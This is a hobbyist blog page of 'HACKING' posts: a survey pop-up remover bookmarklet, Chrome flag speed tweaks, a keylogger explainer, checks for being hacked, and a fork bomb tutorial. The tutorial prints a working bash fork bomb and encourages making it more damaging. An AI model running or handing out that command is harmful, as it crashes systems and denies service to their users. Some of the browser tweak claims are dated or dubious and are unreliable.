Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

How to Remove / Block / Bypass Online Survey Pop-Ups?

Internet is the most powerful place for every brand to advertise and promote there business. While many brands uses standard ways of advertisements (such as banner ads, text links, etc.) to promote their product/service, others use non-friendly, annoying cheap ways which force people to get engaged for their brand and promote their products.

Out of these annoying methods of advertisements, Online Survey Pop-Ups are one of the most used method. While surfing many websites or looking for your favorite software, games, songs, movies, etc. you might have encountered these annoying pop-ups that instantly appears over a webpage and don’t let you to view its content or do anything without completing the tasks mentioned in those surveysThese surveys are very annoying and sometimes, after completing your precious time and completing the surveys, you still don’t get access to the blocked content. So, if you don’t want to get stuck because of these survey pop-ups, these steps will guide you to permanently block these annoying pop-ups.
Step 1:

Step 2: 
Click on your Chrome’s menu button available at top-right corner and from “Bookmark” menu, click on “Show bookmark bar”.


Step 3:-
Now, from the website, click and hold the link says XJZ Survey Remover. Drag the link to your bookmark toolbar and drop the link there.
Step 4: 
Your bookmark is now saved. Its better to name this bookmark, if it hasn’t got one. So right click on your just-created bookmark and from the context menu, click Edit.
Step #5: Through the pop-up window, name this bookmark. Once done, just press “OK”.
Usage :-

On the webpage where surveys are appearing, click on this bookmark to run XJZ Survey Remover. It will automatically scan the webpage and remove the survey for you.
The bookmarklet also provide you option to manually remove the elements from the entire web-page which are blocking your access to the content. If you want to use XJZ Bookmarklet Remove on any other web-browser, you can either drag the bookmark or manually paste the bookmarklet code provided at the website to your manually created bookmark’s address field.

You can also install XJZ Survey Remover Add-on for Chrome browser which will automatically remove surveys from the webpage.
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10 Speed Hacks That'll Make Google Chrome Blazing Fast

If browsing speed is important to you—and it should be—you'll probably be interested to know that there are ten simple flag modifications you can make in Google Chrome in order to achieve the fastest browsing speed possible.

Step 1: Access Chrome's "Secret" Settings

Chrome allows you to use unofficial browser features called "flags" while they are being tested or are generally unstable. These features are strictly experimental and may break or disappear at any time. In other words, take advantage of them while you can.

To access these secret settings, simply enter chrome://flags into your address bar, Hit the Enter key, and you will be brought to the flags page and shown a short warnin
It's okay. These features can all be disabled later if you notice any glitches.

Step 2: To Make Things Simple, Open "Find…"

These flags aren't very organized, so to save you from scrolling up and down all day, hit Cmd+F (Mac) or Ctrl+F (Windows), or click the three-line overflow menu button in the upper-right and select "Find…"
Step 3: Pick & Choose Your Chrome Speed Hacks

Now, below are ten different settings you can mess with in Google Chrome, but you don't need to enable all of them. Pick and choose the ones you want, and find the combination that works best with your workflow. Some things may not apply to your particular browsing game.

Speed Tip #1: Set "Maximum Tiles" to 512

The first feature we're going to change is the number of "maximum tiles for interest area." Basically, this feature will increase the RAM that Chrome is allowed to use, and should take any little glitch out of your browsing experience.

In the search bar that you just opened in Step 2, type Maximum Tiles and hit Enter. Once you're brought to the Maximum Tiles row, click the drop-down menu and change Default to 512.
Speed Tip #2: Change the Number of Raster Threads to 4

Tired of slow loading image? This modification will change the rendering speed of images in Chrome. Search for Number of Raster, and change the number of raster threads to 4.
Speed Tip #3: Enable SPDY/4

This modification will speed up page loading by making web transactions quicker. Search for Enable SPDY, then click the little blue Enable link in the Enable SPDY row; its color should change from light grey to white and the blue link should now say "Disable."

Speed Tip #4: Enable Offline Cache Mode

For moments where internet connectivity is briefly interrupted, you can allow Chrome to load cached versions of webpages. Search for Enable Chrome and click the Enable link in the Offline Cache Mode row.
Speed Tip #5: Enable Experimental Canvas Features

This modification allows Chrome to utilize opaque canvases to increase loading times and boost performance. Search for Enable Experimental Canvas and click Enable in the Experimental Canvas row.
Speed Tip #6: Enable Experimental Websocket Implementation

This feature provides a different way to deal with web traffic communication. Search for Experimental Websocket and click Enable.
Speed Tip #7: Enable Touch Events

Chrome isn't so hot on touchscreens. If you're using an iPad, Microsoft Surface, or some other touchscreen computer, this will dramatically improve Chrome's performance. Search for Touch Events and selectEnable.
Speed Tip #8: Enable Accelerated Overflow Scroll

This will provide a better scrolling experience on particularly long pages. It works by compiling content into a single layer when it would otherwise be presented to you as in an overflow. Search for Accelerated Overflow and change to Enable.
Speed Tip #9: Enable Fast Tab/Window Close

If you can't close a window or tab fast enough, try enabling the Fast Tab flag. This will get content out of your face faster than ever by running Chrome's JavsaScript handler independent of the graphical user interface (GUI). Search for Enable Fast Tab and select Enable.
Speed Tip #10: Enable Checking for Conflicts with 3rd Parties

This only works on Windows, but it's pretty useful. There's nothing worse than a browser crashing in the middle of something important, so this option will run a background check to warn you if software is discovered that may crash the browser. Search Conflicts with 3rd Parties and Enable it.
Step 4: Relaunch Chrome

In order for these changes to take place, you'll need to relaunch Chrome. At the bottom of the chrome://flags page, you will notice a "Relaunch Now" button—click it, and enjoy your speedy browsing upon opening Chrome.
In Next Post we will go through some Speed hacks for Mozilla Firefox........Till then Stay continue...
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How To Crash A PC With Fork Bomb

A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash. A fork bomb creates two instances which each create two instances and so on…The processes recursively fork; this “forks” the processor and jams it completely until a crash occurs. So today i'll explain you how to make it.

Notepad Fork Bomb

Open up notepad and type:


and save it as fork.bat Yep..its a virus of just 5 characters.

On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt.

C Fork Bomb

Here is a in C++ version of Fork bomb.
int main(void)
  return 0;

Shell Script Fork Bomb

And a shell (Unix/bash) version.

: (){ : |:& };:

Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.
                            You can get creative and try to use program executable or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose.

Note:This information is only for educational purpose i'm not be responsible for any lost so just use at your own risk.....
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What Is Keylogger And How To Be Safe From Keyloggers?

In this tutorial I am going to talk about the most use piece of software besides from RAT by hackers to observe your activities on your computer and that is keyloggerskeylogger is a software or hardware device which monitors each and every key typed by you on your keyboard. I am going to talk about different types of keylogger and how to be safe from keyloggers. So lets learn something about keyloggers.

 1. What is keylogger ?

You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.

2. How it can harm you ?

In this section i will talk about how keylogger can harm you in different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.

  • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.

3. Types of  keyloggers 

There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER                                  
hardware keyloggers 
 software keyloggers

 4. How to Protect yourself from keyloggers ?

Keylogger  can be used by your enemy  to get sensitive information such as your Bank credit card details, or password of any social networking sites etc. In order to be safe keep following points in your mind.
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.
You may try any good AntiLogger Like Zemana Antilogger.
Direct Download Zemana Antilogger Free Version From HERE

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5 Ways to Check if you are Hacked

In this post I am going to tell You 5 ways in which you can check if you are hacked.

Just follow along and check all the steps, you might also be one of the victims.

NOTE:- Before doing these steps, close all the downloads and web pages. Make sure on torrent of window update install is going on but stay connected to internet.

1) The first method is very simple for all the people using an ADSL router. After all the internet downloads are closed, just check the status of Ethernet light. It should not blink at a very fast rate. It shows that packets are being transferred in and out of your computer.
But as there is no active download or internet activity so no packets should transfer. If so… you might be hacked

2) goto run and type cmd. The command prompt will open. In the command prompt type

netstat -a

This shows the list of active internet connections, check if any unnecessary internet connection is ESTABLISHED. If so, you might be hacked

if you type just netstat, you will get the list of all the netstat commands, you may try the other commands as well.

3) You notice any abnormal activity in your computer, like your computer hangs for a couple of seconds every time you switch it on or in between your tasks (if it occurs often), there is a chance that you are hacked. Often keyloggers and trojans are configured to deliver all the log information to the destination ip address/ ftp address after reqular interval of time. And when this information is being sent, the browser hangs for some time.

4) Use softwares like TCP view, it gives the list of all the connections made through TCP. This software is capable of detecting almost all the trojan/malicious connections.

5) Keep the antivirus updated and install an external firewall like comodo. If your antivirus is not updated regularly, it is as good as nothing. If you don’t update your antivirus reqularly and often exchange data from other computers and download a lot of files. There is a great possibility that you are hacked.

Beware!! Stay updated, stay Protected.
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Hi Friends, I'm SoNu, Currently living In Bhopal,India. I'm Student Of Computer Science and Engineering, a Computer Enthusiast and a Newbie Blogger.

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